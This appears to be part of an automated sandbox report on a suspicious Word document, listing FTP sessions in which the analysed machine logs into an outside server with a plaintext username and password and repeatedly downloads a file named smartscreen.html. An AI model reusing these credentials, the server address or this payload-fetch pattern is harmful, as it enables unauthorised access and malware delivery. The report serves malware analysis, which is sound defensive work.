      Sep 19, 2022 15:35:16.975233078 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:17.021047115 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:17.021126032 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:17.021822929 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:17.067738056 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:17.068016052 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:17.068191051 CEST4917821699192.168.2.22185.27.134.11
      TimestampSource PortDest PortSource IPDest IPCommands
      Sep 19, 2022 15:35:09.497766972 CEST2149173185.27.134.11192.168.2.22220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
      Sep 19, 2022 15:35:09.499121904 CEST4917321192.168.2.22185.27.134.11USER epiz_32622638
      Sep 19, 2022 15:35:09.546256065 CEST2149173185.27.134.11192.168.2.22331 User epiz_32622638 OK. Password required
      Sep 19, 2022 15:35:09.558320999 CEST4917321192.168.2.22185.27.134.11PASS 9pTise0WWBCZj
      Sep 19, 2022 15:35:09.635483980 CEST2149173185.27.134.11192.168.2.22230-Your bandwidth usage is restricted
      230-Your bandwidth usage is restricted230 OK. Current restricted directory is /
      Sep 19, 2022 15:35:09.762413025 CEST2149174185.27.134.11192.168.2.22220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 439 of 6900 allowed.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 439 of 6900 allowed.220-Local time is now 09:04. Server port: 21.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 439 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 439 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
      Sep 19, 2022 15:35:09.763664961 CEST4917421192.168.2.22185.27.134.11USER epiz_32622638
      Sep 19, 2022 15:35:09.809530973 CEST2149174185.27.134.11192.168.2.22331 User epiz_32622638 OK. Password required
      Sep 19, 2022 15:35:09.809971094 CEST4917421192.168.2.22185.27.134.11PASS 9pTise0WWBCZj
      Sep 19, 2022 15:35:09.883455038 CEST2149174185.27.134.11192.168.2.22230-Your bandwidth usage is restricted
      230-Your bandwidth usage is restricted230 OK. Current restricted directory is /
      Sep 19, 2022 15:35:09.884032011 CEST4917421192.168.2.22185.27.134.11TYPE I
      Sep 19, 2022 15:35:09.930010080 CEST2149174185.27.134.11192.168.2.22200 TYPE is now 8-bit binary
      Sep 19, 2022 15:35:09.932235956 CEST4917421192.168.2.22185.27.134.11PASV
      Sep 19, 2022 15:35:09.978365898 CEST2149174185.27.134.11192.168.2.22227 Entering Passive Mode (185,27,134,11,153,184)
      Sep 19, 2022 15:35:10.077305079 CEST2149174185.27.134.11192.168.2.22213 6785
      Sep 19, 2022 15:35:10.077773094 CEST4917421192.168.2.22185.27.134.11RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Sep 19, 2022 15:35:10.123992920 CEST2149174185.27.134.11192.168.2.22150-Accepted data connection
      150-Accepted data connection150 6.6 kbytes to download
      Sep 19, 2022 15:35:10.124320984 CEST2149174185.27.134.11192.168.2.22226-File successfully transferred
      226-File successfully transferred226 0.000 seconds (measured here), 42.01 Mbytes per second
      Sep 19, 2022 15:35:13.237507105 CEST4917321192.168.2.22185.27.134.11CWD /wwwwwwwwwwwwwwwwwwww/
      Sep 19, 2022 15:35:13.283632994 CEST2149173185.27.134.11192.168.2.22250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
      Sep 19, 2022 15:35:13.284157991 CEST4917321192.168.2.22185.27.134.11PWD
      Sep 19, 2022 15:35:13.330005884 CEST2149173185.27.134.11192.168.2.22257 "/wwwwwwwwwwwwwwwwwwww" is your current location
      Sep 19, 2022 15:35:13.330579042 CEST4917321192.168.2.22185.27.134.11TYPE A
      Sep 19, 2022 15:35:13.376211882 CEST2149173185.27.134.11192.168.2.22200 TYPE is now ASCII
      Sep 19, 2022 15:35:13.377398014 CEST4917321192.168.2.22185.27.134.11PORT 192,168,2,22,192,24
      Sep 19, 2022 15:35:13.424968958 CEST2149173185.27.134.11192.168.2.22500 I won't open a connection to 192.168.2.22 (only to 84.17.52.43)
      Sep 19, 2022 15:35:13.472584009 CEST2149173185.27.134.11192.168.2.22500 Unknown command
      Sep 19, 2022 15:35:13.477826118 CEST4917321192.168.2.22185.27.134.11CWD /wwwwwwwwwwwwwwwwwwww/
      Sep 19, 2022 15:35:13.525742054 CEST2149173185.27.134.11192.168.2.22250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
      Sep 19, 2022 15:35:13.630390882 CEST2149177185.27.134.11192.168.2.22220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 437 of 6900 allowed.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 437 of 6900 allowed.220-Local time is now 09:04. Server port: 21.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 437 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 437 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
      Sep 19, 2022 15:35:13.631063938 CEST4917721192.168.2.22185.27.134.11USER anonymous
      Sep 19, 2022 15:35:13.677181005 CEST2149177185.27.134.11192.168.2.22331 User anonymous OK. Password required
      Sep 19, 2022 15:35:13.677336931 CEST4917721192.168.2.22185.27.134.11PASS User@
      Sep 19, 2022 15:35:16.897815943 CEST2149177185.27.134.11192.168.2.22530 Login authentication failed
      Sep 19, 2022 15:35:16.959027052 CEST2149177185.27.134.11192.168.2.22530 Logout.
      Sep 19, 2022 15:35:16.975233078 CEST4917421192.168.2.22185.27.134.11TYPE I
      Sep 19, 2022 15:35:17.021047115 CEST2149174185.27.134.11192.168.2.22200 TYPE is now 8-bit binary
      Sep 19, 2022 15:35:17.021822929 CEST4917421192.168.2.22185.27.134.11PASV
      Sep 19, 2022 15:35:17.067738056 CEST2149174185.27.134.11192.168.2.22227 Entering Passive Mode (185,27,134,11,84,195)
      Sep 19, 2022 15:35:17.170260906 CEST2149174185.27.134.11192.168.2.22213 6785
      Sep 19, 2022 15:35:17.170964003 CEST4917421192.168.2.22185.27.134.11RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Sep 19, 2022 15:35:17.217103004 CEST2149174185.27.134.11192.168.2.22150-Accepted data connection
      150-Accepted data connection150 6.6 kbytes to download
      Sep 19, 2022 15:35:17.217526913 CEST2149174185.27.134.11192.168.2.22226-File successfully transferred
      226-File successfully transferred226 0.000 seconds (measured here), 58.74 Mbytes per second
      Sep 19, 2022 15:35:18.153563023 CEST4917321192.168.2.22185.27.134.11CWD /wwwwwwwwwwwwwwwwwwww/
      Sep 19, 2022 15:35:18.205420971 CEST2149173185.27.134.11192.168.2.22250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
      Sep 19, 2022 15:35:18.214751005 CEST4917321192.168.2.22185.27.134.11PWD
      Sep 19, 2022 15:35:18.261095047 CEST2149173185.27.134.11192.168.2.22257 "/wwwwwwwwwwwwwwwwwwww" is your current location
      Sep 19, 2022 15:35:18.279761076 CEST4917321192.168.2.22185.27.134.11TYPE A
      Sep 19, 2022 15:35:18.325869083 CEST2149173185.27.134.11192.168.2.22200 TYPE is now ASCII
      Sep 19, 2022 15:35:18.575798035 CEST4917321192.168.2.22185.27.134.11PORT 192,168,2,22,192,27
      Sep 19, 2022 15:35:18.621969938 CEST2149173185.27.134.11192.168.2.22500 I won't open a connection to 192.168.2.22 (only to 84.17.52.43)
      Sep 19, 2022 15:35:18.669007063 CEST2149173185.27.134.11192.168.2.22500 Unknown command
      Sep 19, 2022 15:35:18.670809031 CEST4917321192.168.2.22185.27.134.11CWD /wwwwwwwwwwwwwwwwwwww/
      Sep 19, 2022 15:35:18.716697931 CEST2149173185.27.134.11192.168.2.22250 OK. Current directory is /wwwwwwwwwwwwwwwwwwww
      Sep 19, 2022 15:35:18.813282013 CEST2149180185.27.134.11192.168.2.22220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 425 of 6900 allowed.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 425 of 6900 allowed.220-Local time is now 09:04. Server port: 21.
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 425 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login
      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 425 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
      Sep 19, 2022 15:35:18.881031036 CEST4918021192.168.2.22185.27.134.11USER anonymous
      Sep 19, 2022 15:35:18.929721117 CEST2149180185.27.134.11192.168.2.22331 User anonymous OK. Password required
      Sep 19, 2022 15:35:18.942280054 CEST4918021192.168.2.22185.27.134.11PASS User@
      Sep 19, 2022 15:35:23.883035898 CEST2149180185.27.134.11192.168.2.22530 Login authentication failed
      Sep 19, 2022 15:35:23.899719000 CEST4917421192.168.2.22185.27.134.11TYPE I
      Sep 19, 2022 15:35:23.929241896 CEST2149180185.27.134.11192.168.2.22530 Logout.
      Sep 19, 2022 15:35:23.947046041 CEST2149174185.27.134.11192.168.2.22200 TYPE is now 8-bit binary
      Sep 19, 2022 15:35:23.948895931 CEST4917421192.168.2.22185.27.134.11PASV
      Sep 19, 2022 15:35:23.997334957 CEST2149174185.27.134.11192.168.2.22227 Entering Passive Mode (185,27,134,11,186,174)
      Sep 19, 2022 15:35:24.090854883 CEST2149174185.27.134.11192.168.2.22213 6785
      Sep 19, 2022 15:35:24.091589928 CEST4917421192.168.2.22185.27.134.11RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Sep 19, 2022 15:35:24.137540102 CEST2149174185.27.134.11192.168.2.22150-Accepted data connection
      150-Accepted data connection150 6.6 kbytes to download
      Sep 19, 2022 15:35:24.137762070 CEST2149174185.27.134.11192.168.2.22226-File successfully transferred
      226-File successfully transferred226 0.000 seconds (measured here), 76.24 Mbytes per second
      Sep 19, 2022 15:35:52.766136885 CEST4917421192.168.2.22185.27.134.11TYPE I
      Sep 19, 2022 15:35:52.812201977 CEST2149174185.27.134.11192.168.2.22200 TYPE is now 8-bit binary
      Sep 19, 2022 15:35:52.813280106 CEST4917421192.168.2.22185.27.134.11PASV
      Sep 19, 2022 15:35:52.859060049 CEST2149174185.27.134.11192.168.2.22227 Entering Passive Mode (185,27,134,11,197,220)
      Sep 19, 2022 15:35:52.951682091 CEST2149174185.27.134.11192.168.2.22213 6785
      Sep 19, 2022 15:35:52.954638958 CEST4917421192.168.2.22185.27.134.11RETR /wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Sep 19, 2022 15:35:53.000704050 CEST2149174185.27.134.11192.168.2.22150-Accepted data connection
      150-Accepted data connection150 6.6 kbytes to download
      Sep 19, 2022 15:35:53.000948906 CEST2149174185.27.134.11192.168.2.22226-File successfully transferred
      226-File successfully transferred226 0.000 seconds (measured here), 33.02 Mbytes per second
      Sep 19, 2022 15:36:18.816196918 CEST2149173185.27.134.11192.168.2.22421 Timeout - try typing a little faster next time
      Sep 19, 2022 15:36:53.100967884 CEST2149174185.27.134.11192.168.2.22421 Timeout - try typing a little faster next time
      No statistics
      Target ID:0
      Start time:15:34:14
      Start date:19/09/2022
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f7d0000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      No disassembly